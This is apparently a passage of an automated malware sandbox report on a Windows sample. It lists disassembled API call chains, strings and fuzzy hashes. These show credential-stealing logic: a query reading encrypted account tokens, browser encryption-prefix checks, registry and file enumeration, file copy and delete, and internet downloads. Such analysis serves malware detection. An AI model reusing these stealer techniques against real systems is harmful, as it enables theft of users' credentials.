                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008C93D0,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,008C93D0,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                • __aulldiv.LIBCMT ref: 00418172
                                                • __aulldiv.LIBCMT ref: 00418180
                                                • wsprintfA.USER32 ref: 004181AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                • String ID: %d MB$@
                                                • API String ID: 2886426298-3474575989
                                                • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                APIs
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A51
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A68
                                                  • Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A7F
                                                  • Part of subcall function 00814A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814AA0
                                                  • Part of subcall function 00814A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814AB0
                                                • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 00816376
                                                • StrCmpCA.SHLWAPI(?,0064A480), ref: 008163AE
                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 008163F6
                                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0081641A
                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00816443
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00816471
                                                • CloseHandle.KERNEL32(?,?,00000400), ref: 008164B0
                                                • InternetCloseHandle.WININET(?), ref: 008164BA
                                                • InternetCloseHandle.WININET(00000000), ref: 008164C7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                • String ID:
                                                • API String ID: 4287319946-0
                                                • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                • Instruction ID: 3bad36f59de9c6d2cac803e3f260b1953df843a2a09ceb775435df6b0022613f
                                                • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                • Instruction Fuzzy Hash: 40516AB5A40218ABDB24DFA4DC45BEE7779FF04705F108098B605A7180EBB46AC5CF96
                                                APIs
                                                • memset.MSVCRT ref: 00824FEE
                                                  • Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072
                                                • lstrcat.KERNEL32(?,00000000), ref: 00825017
                                                • lstrcat.KERNEL32(?,00421000), ref: 00825034
                                                  • Part of subcall function 00824B77: wsprintfA.USER32 ref: 00824B93
                                                  • Part of subcall function 00824B77: FindFirstFileA.KERNEL32(?,?), ref: 00824BAA
                                                • memset.MSVCRT ref: 0082507A
                                                • lstrcat.KERNEL32(?,00000000), ref: 008250A3
                                                • lstrcat.KERNEL32(?,00421020), ref: 008250C0
                                                  • Part of subcall function 00824B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00824BD8
                                                  • Part of subcall function 00824B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00824BEE
                                                  • Part of subcall function 00824B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00824DE4
                                                  • Part of subcall function 00824B77: FindClose.KERNEL32(000000FF), ref: 00824DF9
                                                • memset.MSVCRT ref: 00825106
                                                • lstrcat.KERNEL32(?,00000000), ref: 0082512F
                                                • lstrcat.KERNEL32(?,00421038), ref: 0082514C
                                                  • Part of subcall function 00824B77: wsprintfA.USER32 ref: 00824C17
                                                  • Part of subcall function 00824B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 00824C2C
                                                  • Part of subcall function 00824B77: wsprintfA.USER32 ref: 00824C49
                                                  • Part of subcall function 00824B77: PathMatchSpecA.SHLWAPI(?,?), ref: 00824C85
                                                  • Part of subcall function 00824B77: lstrcat.KERNEL32(?,0064A524), ref: 00824CB1
                                                  • Part of subcall function 00824B77: lstrcat.KERNEL32(?,00420FF8), ref: 00824CC3
                                                  • Part of subcall function 00824B77: lstrcat.KERNEL32(?,?), ref: 00824CD7
                                                  • Part of subcall function 00824B77: lstrcat.KERNEL32(?,00420FFC), ref: 00824CE9
                                                  • Part of subcall function 00824B77: lstrcat.KERNEL32(?,?), ref: 00824CFD
                                                  • Part of subcall function 00824B77: CopyFileA.KERNEL32(?,?,00000001), ref: 00824D13
                                                  • Part of subcall function 00824B77: DeleteFileA.KERNEL32(?), ref: 00824D98
                                                • memset.MSVCRT ref: 00825192
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                • String ID:
                                                • API String ID: 4017274736-0
                                                • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                • Instruction ID: 48c60d13f30f21137bd8b5da6674792088ba395a8397ad571404d208adf62428
                                                • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                • Instruction Fuzzy Hash: 79418579A4022867DB14F7B0EC47FE97738EF24701F404494B685A61C1EEB997D88BA3
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 00828397
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0082839E
                                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008283BF
                                                • __aulldiv.LIBCMT ref: 008283D9
                                                • __aulldiv.LIBCMT ref: 008283E7
                                                • wsprintfA.USER32 ref: 00828413
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                • String ID: @
                                                • API String ID: 2774356765-2766056989
                                                • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                • Instruction ID: d742387dc86be4e8b7af51a7e7c811a5f5cf9c4484f2a81572333488ed03e377
                                                • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                • Instruction Fuzzy Hash: CC214AB1E44218ABDB00DFD4DC49FAEBBB9FB44B14F204619F605BB2C0C77869008BA5
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                  • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                • API String ID: 1440504306-1079375795
                                                • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess$DefaultLangUser
                                                • String ID: B
                                                • API String ID: 1494266314-2248957098
                                                • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                APIs
                                                • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                  • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                  • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                  • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                  • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                • memset.MSVCRT ref: 00409EE8
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                • API String ID: 1977917189-1096346117
                                                • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                APIs
                                                  • Part of subcall function 00817537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008175A1
                                                  • Part of subcall function 00817537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00817618
                                                  • Part of subcall function 00817537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00817674
                                                  • Part of subcall function 00817537: GetProcessHeap.KERNEL32(00000000,?), ref: 008176B9
                                                  • Part of subcall function 00817537: HeapFree.KERNEL32(00000000), ref: 008176C0
                                                • lstrcat.KERNEL32(0064A668,004217FC), ref: 0081786D
                                                • lstrcat.KERNEL32(0064A668,00000000), ref: 008178AF
                                                • lstrcat.KERNEL32(0064A668,00421800), ref: 008178C1
                                                • lstrcat.KERNEL32(0064A668,00000000), ref: 008178F6
                                                • lstrcat.KERNEL32(0064A668,00421804), ref: 00817907
                                                • lstrcat.KERNEL32(0064A668,00000000), ref: 0081793A
                                                • lstrcat.KERNEL32(0064A668,00421808), ref: 00817954
                                                • task.LIBCPMTD ref: 00817962
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                • String ID:
                                                • API String ID: 2677904052-0
                                                • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                • Instruction ID: 7fabf4525de7dc01449866ef00854a149962893a865a2cd0316d39671537615c
                                                • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                • Instruction Fuzzy Hash: D2315C79A40109EFDB08FBE4DC96DFE777AFF45301B145118E112E72A0DA34A986CB62
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00815231
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00815238
                                                • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00815251
                                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00815278
                                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 008152A8
                                                • memcpy.MSVCRT(00000000,?,00000001), ref: 008152F1
                                                • InternetCloseHandle.WININET(?), ref: 00815320
                                                • InternetCloseHandle.WININET(?), ref: 0081532D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                • String ID:
                                                • API String ID: 1008454911-0
                                                • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                • Instruction ID: 592b5c42f01f4edccddad632daf043b7fc54b01662f04dd25649016240fda6f0
                                                • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                • Instruction Fuzzy Hash: 553107B8A40218EBDB20CF94DC85BDCB7B5FF48704F1081D9E609A7281D7706AC58F59
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                                • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                                • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                                • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                                • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                                • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                                • InternetCloseHandle.WININET(?), ref: 004050C6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                • String ID:
                                                • API String ID: 3894370878-0
                                                • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                                • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                                APIs
                                                  • Part of subcall function 0082AA87: lstrlen.KERNEL32(0081516C,?,?,0081516C,00420DDE), ref: 0082AA92
                                                  • Part of subcall function 0082AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0082AAEC
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 008258AB
                                                • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 00825908
                                                • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 00825ABE
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 00825457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 0082548F
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 00825527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0082557F
                                                  • Part of subcall function 00825527: lstrlen.KERNEL32(00000000), ref: 00825596
                                                  • Part of subcall function 00825527: StrStrA.SHLWAPI(00000000,00000000), ref: 008255CB
                                                  • Part of subcall function 00825527: lstrlen.KERNEL32(00000000), ref: 008255EA
                                                  • Part of subcall function 00825527: strtok.MSVCRT(00000000,?), ref: 00825605
                                                  • Part of subcall function 00825527: lstrlen.KERNEL32(00000000), ref: 00825615
                                                • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 008259F2
                                                • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 00825BA7
                                                • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 00825C73
                                                • Sleep.KERNEL32(0000EA60), ref: 00825C82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpylstrlen$Sleepstrtok
                                                • String ID:
                                                • API String ID: 3630751533-0
                                                • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                • Instruction ID: 9b1d74a87e3b7b8b5a0511ff9449d3d29049d4cf9629f58466813b4dd2665bcd
                                                • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                • Instruction Fuzzy Hash: A2E13D71950628ABCB18FBA8FD969EE7379FF55300F408128B506E6191EF345B88CB53
                                                APIs
                                                • memset.MSVCRT ref: 0081158E
                                                  • Part of subcall function 00811507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0081151B
                                                  • Part of subcall function 00811507: RtlAllocateHeap.NTDLL(00000000), ref: 00811522
                                                  • Part of subcall function 00811507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0081153E
                                                  • Part of subcall function 00811507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0081155C
                                                  • Part of subcall function 00811507: RegCloseKey.ADVAPI32(?), ref: 00811566
                                                • lstrcat.KERNEL32(?,00000000), ref: 008115B6
                                                • lstrlen.KERNEL32(?), ref: 008115C3
                                                • lstrcat.KERNEL32(?,004262E4), ref: 008115DE
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 008116CC
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 00819C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00819C53
                                                  • Part of subcall function 00819C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819C78
                                                  • Part of subcall function 00819C27: LocalAlloc.KERNEL32(00000040,?), ref: 00819C98
                                                  • Part of subcall function 00819C27: ReadFile.KERNEL32(000000FF,?,00000000,008116F6,00000000), ref: 00819CC1
                                                  • Part of subcall function 00819C27: LocalFree.KERNEL32(008116F6), ref: 00819CF7
                                                  • Part of subcall function 00819C27: CloseHandle.KERNEL32(000000FF), ref: 00819D01
                                                • DeleteFileA.KERNEL32(00000000), ref: 00811756
                                                • memset.MSVCRT ref: 0081177D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                • String ID:
                                                • API String ID: 3885987321-0
                                                • Opcode ID: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                                                • Instruction ID: 97398b8d7a2193e0beedcbaa30b93d15825d0e0ef9f872da676e3dc606e21b76
                                                • Opcode Fuzzy Hash: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                                                • Instruction Fuzzy Hash: 335124719502289BCB19FB64ED96AED737CFF54700F4041A8B60AA2082EE305BC9CF57
                                                APIs
                                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                • wsprintfA.USER32 ref: 00418459
                                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • RegQueryValueExA.ADVAPI32(00000000,008C9370,00000000,000F003F,?,00000400), ref: 004184EC
                                                • lstrlenA.KERNEL32(?), ref: 00418501
                                                • RegQueryValueExA.ADVAPI32(00000000,008C92C8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                • String ID: %s\%s
                                                • API String ID: 3896182533-4073750446
                                                • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                                • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
